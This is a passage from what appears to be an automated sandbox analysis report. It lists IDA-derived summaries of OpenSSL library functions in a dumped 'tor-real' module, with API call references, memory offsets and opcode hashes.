                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$R_put_error$O_reallocstrncmp$M_read_bioO_ctrlO_newO_s_filememcpystrlen
                                                                            • String ID: FOR$A$ERIN$ERIN$FO F$FOV2$OR $SERV$SERV$l
                                                                            • API String ID: 3095373799-598870608
                                                                            • Opcode ID: 4ad274938bf5a0ddb9c7874a794ec723945790a615a9aa4e0e77fe2d2c6ca6ac
                                                                            • Instruction ID: 24e5eeb2fa93369194234f9d848651945fcdea9c712be2384f4d8589c9f40b8b
                                                                            • Opcode Fuzzy Hash: 4ad274938bf5a0ddb9c7874a794ec723945790a615a9aa4e0e77fe2d2c6ca6ac
                                                                            • Instruction Fuzzy Hash: 41E1DEB46083469FD301DF65C48475FBBE0BF89308F50891DE5D8AB750DBB9EA488B86
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0DA7EE
                                                                            • EVP_CIPHER_CTX_new.LIBCRYPTO-1_1 ref: 6C0DA7FD
                                                                            • HMAC_CTX_new.LIBCRYPTO-1_1 ref: 6C0DA806
                                                                            • EVP_CIPHER_CTX_iv_length.LIBCRYPTO-1_1 ref: 6C0DA917
                                                                            • EVP_MD_size.LIBCRYPTO-1_1 ref: 6C0DAB45
                                                                            • RAND_bytes.LIBCRYPTO-1_1 ref: 6C0DABC8
                                                                            • time.MSVCRT ref: 6C0DAC85
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0DACC1
                                                                            • CRYPTO_memdup.LIBCRYPTO-1_1 ref: 6C0DACF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X_new$D_bytesD_sizeO_freeO_mallocO_memdupX_iv_lengthtime
                                                                            • String ID: $@$A
                                                                            • API String ID: 3790227056-2820341008
                                                                            • Opcode ID: 124c7c3383ca4acecb65b200e13a4fee016c04a1cf1e8b10d31beb04574bd839
                                                                            • Instruction ID: 7e8be72ca44a9abfeb45c1fe79c9c111b03a5c9900429e7cc4c36b6d7c5e3b78
                                                                            • Opcode Fuzzy Hash: 124c7c3383ca4acecb65b200e13a4fee016c04a1cf1e8b10d31beb04574bd839
                                                                            • Instruction Fuzzy Hash: D862D0B46093419FD750DF29C18475EBBF0BF88748F61892DE9988B751E778E848CB82
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B2A69
                                                                              • Part of subcall function 6C0ACAE0: OPENSSL_init_crypto.LIBCRYPTO-1_1 ref: 6C0ACB14
                                                                              • Part of subcall function 6C0A5120: CRYPTO_THREAD_run_once.LIBCRYPTO-1_1 ref: 6C0A5132
                                                                            • CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C0B26DA
                                                                            • CRYPTO_THREAD_lock_new.LIBCRYPTO-1_1 ref: 6C0B2727
                                                                            • OPENSSL_LH_new.LIBCRYPTO-1_1 ref: 6C0B2770
                                                                            • X509_STORE_new.LIBCRYPTO-1_1 ref: 6C0B2780
                                                                            • CTLOG_STORE_new.LIBCRYPTO-1_1 ref: 6C0B2790
                                                                              • Part of subcall function 6C0A90D0: OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0A90DE
                                                                              • Part of subcall function 6C0A90D0: CONF_parse_list.LIBCRYPTO-1_1 ref: 6C0A9111
                                                                              • Part of subcall function 6C0A90D0: OPENSSL_sk_free.LIBCRYPTO-1_1 ref: 6C0A9120
                                                                              • Part of subcall function 6C0A9280: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A9355
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0B27FA
                                                                            • X509_VERIFY_PARAM_new.LIBCRYPTO-1_1 ref: 6C0B2807
                                                                            • EVP_get_digestbyname.LIBCRYPTO-1_1 ref: 6C0B2821
                                                                            • EVP_get_digestbyname.LIBCRYPTO-1_1 ref: 6C0B283B
                                                                            • OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0B284E
                                                                            • OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0B2861
                                                                            • CRYPTO_new_ex_data.LIBCRYPTO-1_1 ref: 6C0B2889
                                                                            • CRYPTO_secure_zalloc.LIBCRYPTO-1_1 ref: 6C0B28AD
                                                                            • RAND_bytes.LIBCRYPTO-1_1 ref: 6C0B28F2
                                                                            • RAND_priv_bytes.LIBCRYPTO-1_1 ref: 6C0B291A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B299F
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B29CB
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B2A07
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B2A9F
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B2AB9
                                                                              • Part of subcall function 6C0A5160: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C0A517B
                                                                              • Part of subcall function 6C0A5160: CRYPTO_THREAD_lock_new.LIBCRYPTO-1_1 ref: 6C0A51B4
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B2AEF
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B2B27
                                                                            • RAND_priv_bytes.LIBCRYPTO-1_1 ref: 6C0B2B49
                                                                            • RAND_priv_bytes.LIBCRYPTO-1_1 ref: 6C0B2B6A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B2BB7
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B2BE8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$D_priv_bytesL_sk_new_null$D_lock_newE_newO_zallocP_get_digestbynameX509_$D_bytesD_run_onceF_parse_listH_newL_init_cryptoL_sk_freeL_sk_numM_newO_freeO_new_ex_dataO_secure_zalloc
                                                                            • String ID: $A
                                                                            • API String ID: 182319435-926879570
                                                                            • Opcode ID: 890b51fe29932b9742d513140990b0af228f166d34003ccae629a00ba2047c3e
                                                                            • Instruction ID: f81f98e6ac49194305d37536e51acf413f22643577b80f18397664c4f7e35b60
                                                                            • Opcode Fuzzy Hash: 890b51fe29932b9742d513140990b0af228f166d34003ccae629a00ba2047c3e
                                                                            • Instruction Fuzzy Hash: E4C10AB0109306DFE700DFA5C58939ABBE0BF44348F15892DD9989FB51DBB9D048CBA6
                                                                            APIs
                                                                            • ASN1_item_d2i.LIBCRYPTO-1_1 ref: 6C0A46B0
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A4735
                                                                            • ASN1_item_free.LIBCRYPTO-1_1 ref: 6C0A4745
                                                                            • ASN1_item_free.LIBCRYPTO-1_1 ref: 6C0A479A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A47D7
                                                                            • ASN1_item_free.LIBCRYPTO-1_1 ref: 6C0A4C1A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A4C4F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: N1_item_freeR_put_error$N1_item_d2i
                                                                            • String ID: g
                                                                            • API String ID: 3252097584-30677878
                                                                            • Opcode ID: d34967058f78d682ec462ae21b4ac7fdc9a68ed56484ecc2b1be903c1be79ba2
                                                                            • Instruction ID: 202a41949c4c058bf347b5afaf257320b179a3d8d94e969a68c936c638d9abb1
                                                                            • Opcode Fuzzy Hash: d34967058f78d682ec462ae21b4ac7fdc9a68ed56484ecc2b1be903c1be79ba2
                                                                            • Instruction Fuzzy Hash: 1B02E7B81097019FD700DFA5C08079ABBE0BF89308F54996EE8988FB55DB74E886CF51
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2775
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2790
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D27A8
                                                                            • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1 ref: 6C0D27D6
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D27E1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$X_free
                                                                            • String ID: /$i
                                                                            • API String ID: 306345296-165077141
                                                                            • Opcode ID: 35c502d7a24f2507e2368adfd002b2389c5727963d247e047c13416b1b480e9a
                                                                            • Instruction ID: dbeef336a32323411479a5b70007bcebde9559e0ea6d517326ef0493ebb84157
                                                                            • Opcode Fuzzy Hash: 35c502d7a24f2507e2368adfd002b2389c5727963d247e047c13416b1b480e9a
                                                                            • Instruction Fuzzy Hash: FC4247B06097419FD710DF25C08475ABBF1BF89308F568A2DE8988BB51D734E989CF92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0$D$P
                                                                            • API String ID: 0-2772689596
                                                                            • Opcode ID: e7557ddf51bd26ad997c0efd0308556874d6eb06f84693fb6c11ce64a975fe67
                                                                            • Instruction ID: 9cc7f60ddd024233f681a4d0147a349a2112b5d2671154971901254a9fa8a327
                                                                            • Opcode Fuzzy Hash: e7557ddf51bd26ad997c0efd0308556874d6eb06f84693fb6c11ce64a975fe67
                                                                            • Instruction Fuzzy Hash: 3B02DDB060A7019FE300EF69C58875FBBE0AF89748F51891DE8989B751D7B8D4498F83
                                                                            APIs
                                                                            • EVP_MD_size.LIBCRYPTO-1_1 ref: 6C0C0691
                                                                            • EVP_MD_CTX_new.LIBCRYPTO-1_1 ref: 6C0C06ED
                                                                            • EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0C070B
                                                                            • EVP_DigestFinal_ex.LIBCRYPTO-1_1 ref: 6C0C072B
                                                                              • Part of subcall function 6C0E7060: EVP_PKEY_CTX_new_id.LIBCRYPTO-1_1 ref: 6C0E70C1
                                                                              • Part of subcall function 6C0E7060: EVP_PKEY_CTX_free.LIBCRYPTO-1_1 ref: 6C0E711F
                                                                            • OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C0C0856
                                                                            • OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C0C0866
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0C0872
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0C087A
                                                                              • Part of subcall function 6C0E79C0: EVP_PKEY_CTX_new_id.LIBCRYPTO-1_1 ref: 6C0E7A16
                                                                              • Part of subcall function 6C0E79C0: EVP_MD_size.LIBCRYPTO-1_1 ref: 6C0E7A28
                                                                              • Part of subcall function 6C0E79C0: EVP_MD_CTX_new.LIBCRYPTO-1_1 ref: 6C0E7A51
                                                                              • Part of subcall function 6C0E79C0: EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0E7A6F
                                                                              • Part of subcall function 6C0E79C0: EVP_DigestFinal_ex.LIBCRYPTO-1_1 ref: 6C0E7A92
                                                                              • Part of subcall function 6C0E79C0: EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0E7AA2
                                                                              • Part of subcall function 6C0E79C0: EVP_PKEY_derive_init.LIBCRYPTO-1_1 ref: 6C0E7B0D
                                                                              • Part of subcall function 6C0E79C0: EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E7B41
                                                                              • Part of subcall function 6C0E79C0: EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E7B71
                                                                            • EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0C095F
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0C0997
                                                                            • EVP_DigestFinal_ex.LIBCRYPTO-1_1 ref: 6C0C09BF
                                                                            • EVP_PKEY_new_raw_private_key.LIBCRYPTO-1_1 ref: 6C0C09EF
                                                                            • EVP_DigestSignInit.LIBCRYPTO-1_1 ref: 6C0C0A48
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0C0A70
                                                                            • EVP_DigestSignFinal.LIBCRYPTO-1_1 ref: 6C0C0A94
                                                                            • CRYPTO_memcmp.LIBCRYPTO-1_1 ref: 6C0C0ADA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Digest$Final_exInit_exX_free$D_sizeL_cleanseSignUpdateX_ctrlX_newX_new_id$FinalInitO_memcmpY_derive_initY_freeY_new_raw_private_key
                                                                            • String ID: D$P
                                                                            • API String ID: 4064739805-307317852
                                                                            • Opcode ID: 7625d29913794f39370ad0e794c3c0ef9fafa5d7ac0a1a529a2ea7489d997c88
                                                                            • Instruction ID: bece041ca83ffc0600c5ffbf16d81ad8580e8e6b96e3e29d1606efa7ea8d50a0
                                                                            • Opcode Fuzzy Hash: 7625d29913794f39370ad0e794c3c0ef9fafa5d7ac0a1a529a2ea7489d997c88
                                                                            • Instruction Fuzzy Hash: DB12B9B06093819FD350DF29C08475EBBF0AF89748F508A2DE8989B750D779E848CB83
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_flagsX_cipher
                                                                            • String ID: D$P
                                                                            • API String ID: 2855536855-307317852
                                                                            • Opcode ID: 0482a785b65c637ebf0ac00b7c1564f77aca49cb88549d5601b13ea2bab0b2d1
                                                                            • Instruction ID: 6022214f39aff00fd6d65cebfeab3bddde12f32152158dc61d8e27881d3daa47
                                                                            • Opcode Fuzzy Hash: 0482a785b65c637ebf0ac00b7c1564f77aca49cb88549d5601b13ea2bab0b2d1
                                                                            • Instruction Fuzzy Hash: 48F1EDB0609301AFD310DF69C48475BBBE0BF88718F528A2DE4A89B750D775E949CF92
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_cleanseO_freeO_memdupstrcmpstrlen
                                                                            • String ID: D$P
                                                                            • API String ID: 1317467310-307317852
                                                                            • Opcode ID: 3266a2679ff57d5ec4d594ac5f2f8a4109ae84ba9e8686575a4f088a04e0ef1f
                                                                            • Instruction ID: a3fdb4c81005e635dfff1ee4c2284d1332a23fc650cc09d317b333fbb91afdc5
                                                                            • Opcode Fuzzy Hash: 3266a2679ff57d5ec4d594ac5f2f8a4109ae84ba9e8686575a4f088a04e0ef1f
                                                                            • Instruction Fuzzy Hash: 616201B06093019FE710DF25C58879EBBE0BF84708F50992DE9989BA40DBB5D949CF93
                                                                            APIs
                                                                            • OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0CEA6A
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0CEB04
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0CEB14
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_new_nullL_sk_pop_freeX509_free
                                                                            • String ID: /$@$A
                                                                            • API String ID: 1383825558-709520065
                                                                            • Opcode ID: d4588fc526d6880e77d8a2ae0247bc140b1aa5fc6506160a995b0d262b99f629
                                                                            • Instruction ID: 673b1ae788281e7562dcc11211f870675fbaaead1faf99f25c9b473d453366f8
                                                                            • Opcode Fuzzy Hash: d4588fc526d6880e77d8a2ae0247bc140b1aa5fc6506160a995b0d262b99f629
                                                                            • Instruction Fuzzy Hash: 2D02E0B06093018FD304DF29C58575EBBE1BF89748F60892DE4A88B651DB79E949CF83
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D29A6
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D29C1
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D29D9
                                                                            • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1 ref: 6C0D2A38
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D2A43
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$X_free
                                                                            • String ID: /$g$i$i
                                                                            • API String ID: 306345296-3194391274
                                                                            • Opcode ID: 936534f4ea075276f4fab7cc5e3a3b60479af7e6fd9db8174d9fce575eb5c86d
                                                                            • Instruction ID: 13b5ceba65137cb15f0b806eb14f82f96b266f6ce1a387575014f0ba40a8b7aa
                                                                            • Opcode Fuzzy Hash: 936534f4ea075276f4fab7cc5e3a3b60479af7e6fd9db8174d9fce575eb5c86d
                                                                            • Instruction Fuzzy Hash: F7021EB06087418FD710DF25C08476ABBF0BF89348F558A6DE8D88B761D774E989CB92
                                                                            APIs
                                                                            • SRP_Verify_B_mod_N.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D0540), ref: 6C0EA0DE
                                                                            • SRP_Calc_u.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D0540), ref: 6C0EA108
                                                                            • SRP_Calc_x.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D0540), ref: 6C0EA155
                                                                            • SRP_Calc_client_key.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D0540), ref: 6C0EA199
                                                                            • BN_num_bits.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D0540), ref: 6C0EA1AB
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0EA1D3
                                                                            • BN_bn2bin.LIBCRYPTO-1_1 ref: 6C0EA1EB
                                                                              • Part of subcall function 6C0A3510: CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0A356C
                                                                              • Part of subcall function 6C0A3510: memcpy.MSVCRT ref: 6C0A359D
                                                                              • Part of subcall function 6C0A3510: memcpy.MSVCRT ref: 6C0A35C9
                                                                              • Part of subcall function 6C0A3510: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0A35EE
                                                                              • Part of subcall function 6C0A3510: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0A3660
                                                                              • Part of subcall function 6C0A3510: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0A3698
                                                                            • BN_clear_free.LIBCRYPTO-1_1 ref: 6C0EA215
                                                                            • BN_clear_free.LIBCRYPTO-1_1 ref: 6C0EA221
                                                                            • strlen.MSVCRT ref: 6C0EA229
                                                                            • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0EA245
                                                                            • BN_clear_free.LIBCRYPTO-1_1 ref: 6C0EA24D
                                                                            • BN_clear_free.LIBCRYPTO-1_1 ref: 6C0EA29E
                                                                            • BN_clear_free.LIBCRYPTO-1_1 ref: 6C0EA2AA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: N_clear_free$O_clear_free$O_mallocmemcpy$B_mod_Calc_client_keyCalc_uCalc_xN_bn2binN_num_bitsVerify_strlen
                                                                            • String ID: A$P
                                                                            • API String ID: 1650908724-345673399
                                                                            • Opcode ID: b0729bf3fce373b43d6f5a45bed5a75b88a7250f115a0f3344c47dbd0ba81c79
                                                                            • Instruction ID: 3bfcaac3b895f5abf0e993e7b5c21ab3b785f489ac134288707c45f0f55c4fc3
                                                                            • Opcode Fuzzy Hash: b0729bf3fce373b43d6f5a45bed5a75b88a7250f115a0f3344c47dbd0ba81c79
                                                                            • Instruction Fuzzy Hash: FF61FFB06497019FD700DF69C48475EBBE0BF88358F10892DE8A89B781DB79D948CF52
                                                                            APIs
                                                                            • EVP_CIPHER_CTX_iv_length.LIBCRYPTO-1_1 ref: 6C09E0B7
                                                                            • memcpy.MSVCRT ref: 6C09E140
                                                                            • EVP_CipherInit_ex.LIBCRYPTO-1_1 ref: 6C09E1E2
                                                                            • EVP_CIPHER_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C09E21B
                                                                            • EVP_CipherUpdate.LIBCRYPTO-1_1 ref: 6C09E315
                                                                            • EVP_CipherUpdate.LIBCRYPTO-1_1 ref: 6C09E342
                                                                            • EVP_CipherFinal_ex.LIBCRYPTO-1_1 ref: 6C09E365
                                                                            • EVP_CIPHER_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C09E3B4
                                                                            • memmove.MSVCRT ref: 6C09E461
                                                                            • EVP_CipherUpdate.LIBCRYPTO-1_1 ref: 6C09E638
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Cipher$Update$X_ctrl$Final_exInit_exX_iv_lengthmemcpymemmove
                                                                            • String ID: D$P$o
                                                                            • API String ID: 2980357715-72909346
                                                                            • Opcode ID: 915eef0f2bee7e0dfdaadc4cd7762f5f90ac795d267c8d459d2aa8c9a4261d89
                                                                            • Instruction ID: d9999cba72bc7f3f9f0370c44faa6cab2034dc0f83339b6af31f01788e686390
                                                                            • Opcode Fuzzy Hash: 915eef0f2bee7e0dfdaadc4cd7762f5f90ac795d267c8d459d2aa8c9a4261d89
                                                                            • Instruction Fuzzy Hash: 4BF101B05093429FD300DF29C58475ABBF0BF89748F149D6DE8A88BB41E375E984DB92
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: O_free$O_strndup$memcpy$N1_item_free$X509_freetime
                                                                            • String ID:
                                                                            • API String ID: 2542812563-0
                                                                            • Opcode ID: ac0cccfdf9c1ae3ee9f5b7cf8e62b9f5852692ddf7b4bb194b8660af44ecc99e
                                                                            • Instruction ID: 0a8ee3f9595e58e02d937bd2d1337bcb212044d4aa56a932e23d3d13a9e863cd
                                                                            • Opcode Fuzzy Hash: ac0cccfdf9c1ae3ee9f5b7cf8e62b9f5852692ddf7b4bb194b8660af44ecc99e
                                                                            • Instruction Fuzzy Hash: AAC1A2B86057019FDB00CFA5C08079ABBE0BF89308F14896EE8999F765D730E846DF51
                                                                            APIs
                                                                            • OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C0C0856
                                                                            • OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C0C0866
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0C0872
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0C087A
                                                                            • EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0C095F
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0C0997
                                                                            • EVP_DigestFinal_ex.LIBCRYPTO-1_1 ref: 6C0C09BF
                                                                            • EVP_PKEY_new_raw_private_key.LIBCRYPTO-1_1 ref: 6C0C09EF
                                                                            • EVP_DigestSignInit.LIBCRYPTO-1_1 ref: 6C0C0A48
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0C0A70
                                                                            • EVP_DigestSignFinal.LIBCRYPTO-1_1 ref: 6C0C0A94
                                                                            • CRYPTO_memcmp.LIBCRYPTO-1_1 ref: 6C0C0ADA
